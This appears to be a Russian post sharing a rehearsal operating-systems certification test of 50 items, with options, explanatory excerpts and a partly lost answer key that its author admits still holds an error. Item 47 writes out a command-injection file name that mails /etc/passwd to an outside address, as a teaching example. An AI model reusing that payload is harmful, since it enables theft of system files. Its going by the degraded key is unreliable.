Аттестационное тестирование в сфере профессионального образования
(весь юмор в том, что чиновники из Минобра пытаются проверить через тесты спецдисциплину, в которой они "ни уха-ни рыла...", а потому берется какой-нибудь ублюдочный курс и из него выдергиваются вопросы и ответы, все хорошо, если читать именно этот курс, в остальном - вероятность попадания 20-30%; я пошустрил по И-нету, нашел, как мне кажется, прообраз - курс "Операционные системы, среды и оболочки" какого-то южного (то ли ставропольского, то ли черкасского :-) педагогического унивеситета (!!!), и на основании их мудрствований подготовил ответы, добавив в "мутных" случаях комментарии из этого курса, Wiki и Googl-а)
Это - ответы на репетиционный тест, надеюсь, что основной не намного умнее. В вопросы добавлены названия разделов, приведены все ответы, правильные выделены размером. По моему убеждению, чтобы пройти тестирование, нормальному студенту достаточно накануне прочитать два-три раза эту белиберду, память у вас еще прекрасная, что-то в ней останется и этого будет достаточно для 40-50%-ного результата. (В конце есть ряд вопросов по компьютерной безопасности, тема эта в курсе ОС не рассматривается, да и то, что там представлено, - борьба с вирусами в изложении для слабоумных, компьютерная безопасность - серьезная вещь, и не нам, сирым и убогим, в ней разбираться :-).
Успехов вам, М.А.
Приношу свои извинения возможным читателям, в нижеприведенных ответах обнаружены ошибки, которые постараюсь сейчас исправить.М.А. 30.08.12 - 19.00 (к сожалению, одну ошибку все-таки так и не смог найти :-( , простите ).
Специальность: 230101.65 – Вычислительные машины, комплексы, системы и сети Дисциплина: Операционные системы Время выполнения теста: 90 минут Количество заданий: 50
ЗАДАНИЕ N 1 Назначение и функции операционных систем ( - выберите один вариант ответа) Для сетевых операционных систем характерной является функция обеспечения …
| 1)
| прямого доступа к оперативной памяти другого компьютера
|
| 2)
| взаимодействия связанных между собой компьютеров
| 3)
| обмена сигналами между выполняющимися на разных компьютерах программами
|
| 4)
| программных каналов между разными компьютерами
|
|
| ЗАДАНИЕ N 2 Операционная среда ( - выберите один вариант ответа) Одна операционная система может поддерживать несколько …
| 1)
| микропрограммных сред
|
| 2)
| операционных систем
| 3)
| микропрограммных систем
|
| 4)
| операционных сред
|
| Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сред.
|
ЗАДАНИЕ N 3 Прерывания ( - выберите один вариант ответа) Термин "маскирование" означает запрет отдельных …
| 1)
| сигналов прерывания
|
| 2)
| команд пользователя
| 3)
| процессов пользователя
|
| 4)
| команд процессора
|
|
| ЗАДАНИЕ N 4 Процессы и потоки ( - выберите один вариант ответа) Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
| 1)
| супервизорами
|
| 2)
| мониторами
| 3)
| маркерами
|
| 4)
| семафорами
| Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи "обедающие философы" с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров.
|
|
ЗАДАНИЕ N 5Файлы и файловые системы ( - выберите один вариант ответа) Относительный путь к файлу состоит из списка каталогов, которые нужно …
| 1)
| пройти от рабочего каталога, чтобы добраться до файла
|
| 2)
| открыть в корневом процессе, чтобы добраться до файла
| 3)
| добавить в переменную PATH операционной среды
|
| 4)
| пройти от корневого каталога, чтобы добраться до файла
|
|
| ЗАДАНИЕ N 6 Память ( - выберите один вариант ответа) Свопингом сегментов называется перемещение …
| 1)
| блоков файла между каталогами файловой системы
|
| 2)
| блоков данных между процессом и ядром операционной системы
| 3)
| сегментов данных между стеком и оперативной памятью
|
| 4)
| сегментов между оперативной и внешней памятью
|
|
|
ЗАДАНИЕ N 7 Пользователи ( - выберите один вариант ответа) Идентификатор пользователя представляет собой уникальное _______ значение
| 1)
| составное
|
| 2)
| символьное
| 3)
| вещественное
|
| 4)
| целое
|
|
| ЗАДАНИЕ N 8 Режимы работы ( - выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение …
| 1)
| привилегированного режима работы и режима пользователя
|
| 2)
| многопроцессорного режима работы и режима ввода-вывода
| 3)
| диалогового режима работы и режима мультипрограммирования
|
| 4)
| аналогового режима работы и режима микропрограммирования
|
|
|
ЗАДАНИЕ N 9 Концепция процесса ( - выберите один вариант ответа) Последовательная трансляция двух исходных программ является …
| 1)
| одним последовательным процессом
|
| 2)
| двумя одинаковыми процессами
| 3)
| двумя разными процессами
|
| 4)
| одной последовательной задачей
|
|
| ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса ( - выберите несколько вариантов ответа) Идентификатор процесса является частью _____________ процесса.
| 1)
| контекста
|
| 2)
| типа
| 3)
| дескриптора !!!
|
| 4)
| описателя
|
|
|
ЗАДАНИЕ N 11 Иерархия процессов ( - выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только …
| 1)
| двумя из существующих процессов
|
| 2)
| несколькими родительскими процессами
| 3)
| четным количеством родительских процессов
|
| 4)
| одним из существующих процессов
|
|
| ЗАДАНИЕ N 12 Диспетчеризация процессов ( - выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …
| 1)
| длительности выполнения
|
| 2)
| очередности выполнения
| 3)
| скорости выполнения
|
| 4)
| частоте выполнения
|
| Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе, определяя ее степень мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко.
|
ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов ( - выберите один вариант ответа) Приоритет, меняющейся во время исполнения процесса, называется _____________ приоритетом.
| 1)
| фиксированным
|
| 2)
| циклическим
| 3)
| статическим
|
| 4)
| динамическим
|
|
| ЗАДАНИЕ N 14 Синхронизация процессов ( - выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …
| 1)
| адаптации
|
| 2)
| синхронизации
| 3)
| оптимизации
|
| 4)
| буферизации
|
|
|
ЗАДАНИЕ N 15 Средства обработки сигналов ( - выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …
|
1)
| процессами
|
| 2)
| процессорами
| 3)
| сегментами
|
| 4)
| каналами
|
|
| ЗАДАНИЕ N 16 Понятие событийного программирования ????? ( - выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают …
| 1)
| трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
|
| 2)
| возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
| 3)
| необходимость использования графа перехода между состояниями
|
| 4)
| неудобство использования графа переходов между состояниями
|
|
|
ЗАДАНИЕ N 17 Средства коммуникации процессов ( - выберите один вариант ответа) Два параллельных процесса могут быть …
| 1)
| взаимоисключающими
|
| 2)
| независимыми
| 3)
| критическими
|
| 4)
| коммутационными
|
|
| ЗАДАНИЕ N 18 Способы реализации мультипрограммирования ( - выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является …
| 1)
| обеспечение удобства работы пользователей
|
| 2)
| минимизация простоев всех устройств компьютера
| 3)
| минимизация времени выполнения одной задачи
|
| 4)
| обеспечение реактивности системы
|
|
|
ЗАДАНИЕ N 19Организация памяти. Адресное пространство ( - выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …
| 1)
| находить в памяти наиболее долго занятые участки
|
| 2)
| выделять участки памяти произвольных размеров
| 3)
| освобождать память, занятую неактивными процессами
|
| 4)
| перемещать процессы в памяти
|
|
| ЗАДАНИЕ N 20 Методы управления памятью ( - выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти
| 1)
| аварийному завершению
|
| 2)
| ускорению
| 3)
| замедлению выполнения
|
| 4)
| перезапуску
|
|
|
ЗАДАНИЕ N 21 Принципы организации виртуальной памяти ( - выберите несколько вариантов ответа) Виртуальная память позволяет …
| 1)
| отказаться от предоставления прикладным процессам оперативной памяти
|
| 2)
| загружать множество небольших программ, суммарный объем которых больше объема физической памяти
| 3)
| загружать программы, размер которых превышает объем доступной физической памяти
|
| 4)
| загружать программы, скомпилированные для другого процессора
|
|
| ЗАДАНИЕ N 22 Сегментная организация памяти ( - выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур.
| 1)
| состоит из
|
| 2)
| упрощает компоновку
| 3)
| невозможна без
|
| 4)
| усложняет компоновку
|
| Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами.
К ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента);
|
ЗАДАНИЕ N 23 Страничная организация памяти ( - выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в …
| 1)
| только в оперативной памяти
|
| 2)
| в оперативной памяти и на диске
| 3)
| только в процессоре
|
| 4)
| в специальной быстрой памяти процессора и в оперативной памяти
|
|
| ЗАДАНИЕ N 24 Ускорение работы страничной памяти ( - выберите один вариант ответа) Страничная организация предназначена для …
| 1)
| облегчения совместного использования процедур, библиотек и массивов данных
|
| 2)
| повышения уровня защиты программ и данных
| 3)
| получения большого адресного пространства без приобретения дополнительной физической памяти
|
| 4)
| логического разделения программ и данных
|
|
| ЗАДАНИЕ N 25 Принципы замещения страниц ( - выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …
| 1)
| выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске
|
| 2)
| выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
| 3)
| выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске
|
| 4)
| выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц
|
|
| ЗАДАНИЕ N 26 Алгоритмы замещения страниц ( - выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) …
| 1)
| теоретически невозможна
|
| 2)
| возможна при использовании стековой организации таблицы страниц
| 3)
| возможна при условии построения таблицы страниц в виде бинарных деревьев
|
| 4)
| практически невозможна
|
| LRU - хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списке.
|
ЗАДАНИЕ N 27 Прерывания от внешних устройств ( - выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.
| 1)
| контроллер
|
| 2)
| диспетчер
| 3)
| супервизор
|
| 4)
| процессор
|
| супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы
| ЗАДАНИЕ N 28 Классификация устройств ввода-вывода ( - выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.
| 1)
| позиционируемым
|
| 2)
| символьным
| 3)
| адресуемым
|
| 4)
| блочным
|
| Другой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя)
|
ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода ( - выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются …
| 1)
| привилегированными
|
| 2)
| универсальными
| 3)
| приоритетными
|
| 4)
| уникальными
|
|
| ЗАДАНИЕ N 30 Функции супервизора ввода-вывода ( - выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …
| 1)
| супервизору прерываний
|
| 2)
| диспетчеру задач
| 3)
| задаче пользователя
|
| 4)
| супервизору программ
|
|
|
ЗАДАНИЕ N 31 Режимы управления вводом-выводом ( - выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.
| 1)
| рационально время
|
| 2)
| нерационально память
| 3)
| нерационально время
|
| 4)
| рационально память
|
|
| ЗАДАНИЕ N 32 Закрепление устройств, общие устройства ввода-вывода ( - выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» …
| 1)
| соотносится как часть и целое???
|
| 2)
| является более широким!!
| 3)
| является более узким
|
| 4)
| тождественно
|
|
|
ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода ( - выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется …
| 1)
| UCB!!!
|
| 2)
| USB
| 3)
| DCB
|
| 4)
| DRT
|
| Каждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначение каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах ввода/вывода, подключенных к вычислительной системе,- таблица оборудования (equipment table), а каждый элемент этой таблицы называется UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуализации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройствами, описанными посредством первой таблицы оборудования.
| ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод ( - выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.
| 1)
| асинхронный
|
| 2)
| приоритетный
| 3)
| автоматический
|
| 4)
| синхронный
|
|
|
ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках ( - выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.
| 1)
| системным
|
| 2)
| внесистемным
| 3)
| начальным
|
| 4)
| локальным
|
| На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная
запись (master boot record, MBR). В состав MBR входят:
- внесистемный загрузчик (non-system bootstrap - NSB);
- таблица описания разделов диска (таблица разделов, partition table, PT).
| ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках ( - выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …
| 1)
| кластеризации
|
| 2)
| буферизации
| 3)
| диспетчеризации
|
| 4)
| приоритезации
|
|
|
ЗАДАНИЕ N 37 Принципы построенияОС ( - выберите один вариант ответа) Операционная система реального времени должна обеспечивать …
| 1)
| делегирование полномочий
|
| 2)
| наследование приоритетов
| 3)
| пакетную обработку
|
| 4)
| клонирование пользователей
|
| Требования, предъявляемые к среде исполнения систем реального времени, следующие:
- ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приоритетом.
- диспетчер с приоритетом - дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют . Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос.
Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ
- ОС должна быть многозадачной и допускающей вытеснение (preemptable),
- ОС должна обладать понятием приоритета для потоков,
- ОС должна поддерживать предсказуемые механизмы синхронизации,
- ОС должна обеспечивать механизм наследования приоритетов,
| ЗАДАНИЕ N 38 Ядро и ресурсы ( - выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть …
| 1)
| загружены в память
|
| 2)
| выгружены из памяти
| 3)
| отобраны у процесса
|
| 4)
| отобраны у процессора
|
| Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса (например: память).
Невыгружаемый ресурс - этот ресурс нельзя забрать у процесса без потери данных (например: принтер).
|
ЗАДАНИЕ N 39 Интерфейсы операционных систем ( - выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами …
| 1)
| системных ресурсов компьютера
|
| 2)
| регистров общего назначения процессора
| 3)
| интерпретатора команд пользователя
|
| 4)
| адресного пространства процесса
|
| Практически все операционные системы имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество системных вызовов.
| ЗАДАНИЕ N 40 Классификация операционных систем ( - выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим
| 1)
| мультипрограммный
|
| 2)
| виртуальный
| 3)
| однопрограммный
|
| 4)
| многопользовательский???
|
|
|
ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах ( - выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.
| 1)
| вызова утилит операционной системы
|
| 2)
| диспетчера приложений
| 3)
| вредоносных программ
|
| 4)
| подбора пароля
|
| ботнет или зомби-сеть – это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя.
| ЗАДАНИЕ N 42 Основы криптографии ( - выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что …
| 1)
| отправитель сообщения не может его расшифровать
|
| 2)
| отправитель и получатель должны иметь общий секретный ключ
| 3)
| объем вычислений при дешифровании намного больше, чем при шифровании
|
| 4)
| объем вычислений при шифровании намного больше, чем при дешифровании
|
| Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом
|
ЗАДАНИЕ N 43 Механизмы защиты ( - выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть …
| ВАРИАНТЫ ОТВЕТОВ:
1)
| устройства отображения информации
|
| 2)
| помещения
| 3)
| сотрудники
|
| 4)
| программы
|
| Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации.
| ЗАДАНИЕ N 44 Надежные вычислительные системы ( - выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на ...
| ВАРИАНТЫ ОТВЕТОВ:
1)
| пользователей
|
| 2)
| прикладную программу
| 3)
| операционную систему
|
| 4)
| руководителей подразделений
|
|
|
ЗАДАНИЕ N 45 Методы аутентификации ( - выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем …
| 1)
| шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей
|
| 2)
| привлечения инсайдеров в качестве сообщников
| 3)
| расшифровки всех паролей после копирования файла паролей
|
| 4)
| вычисления пароля путем свертки идентификатора пользователя
|
|
| ЗАДАНИЕ N 46 Инсайдерские атаки ( - выберите один вариант ответа) Лазейки в программах создаются …
| 1)
| для облегчения отладки программ или в противоправных целях
|
| 2)
| только для противоправных целей
| 3)
| для внедрения в программу постороннего кода
|
| 4)
| только для облегчения отладки программ
|
| Лазейки (trapdoors). Лазейка представляет собой точку входа в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно вставляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить.
|
ЗАДАНИЕ N 47 Внешние атаки ( - выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?
| 1)
| Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.
|
| 2)
| Отправит файл aaa адресату goofinator@mail.ru.
| 3)
| Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.
|
| 4)
| Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.
|
|
| ЗАДАНИЕ N 48 Вредоносные программы ( - выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …
| 1)
| организация сетевых азартных игр
|
| 2)
| распространение пиратского контента
| 3)
| рассылка коммерческого спама
|
| 4)
| хищение денег с кредитных карт
|
|
|
ЗАДАНИЕ N 49 Троянские кони и вирусы ( - выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем …
| 1)
| записи кода вируса в тело зараженной программы после каждого ее вызова
|
| 2)
| перезаписи содержимого стека программы кодом вируса
| 3)
| перезаписи служебных секторов дисков
|
| 4)
| записи вируса на место кода программы!!!
|
|
| ЗАДАНИЕ N 50 Средства защиты от вредоносных программ ( - выберите один вариант ответа) Обнаружить зашифрованный вирус можно ...
| 1)
| с помощью универсальной программы дешифрования
|
| 2)
| по характерному поведению зараженной программы при запуске
| 3)
| по сигнатурам кода процедур расшифровки вируса!!!
|
| 4)
| по изменению размера программы
|
| Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой
|
|
|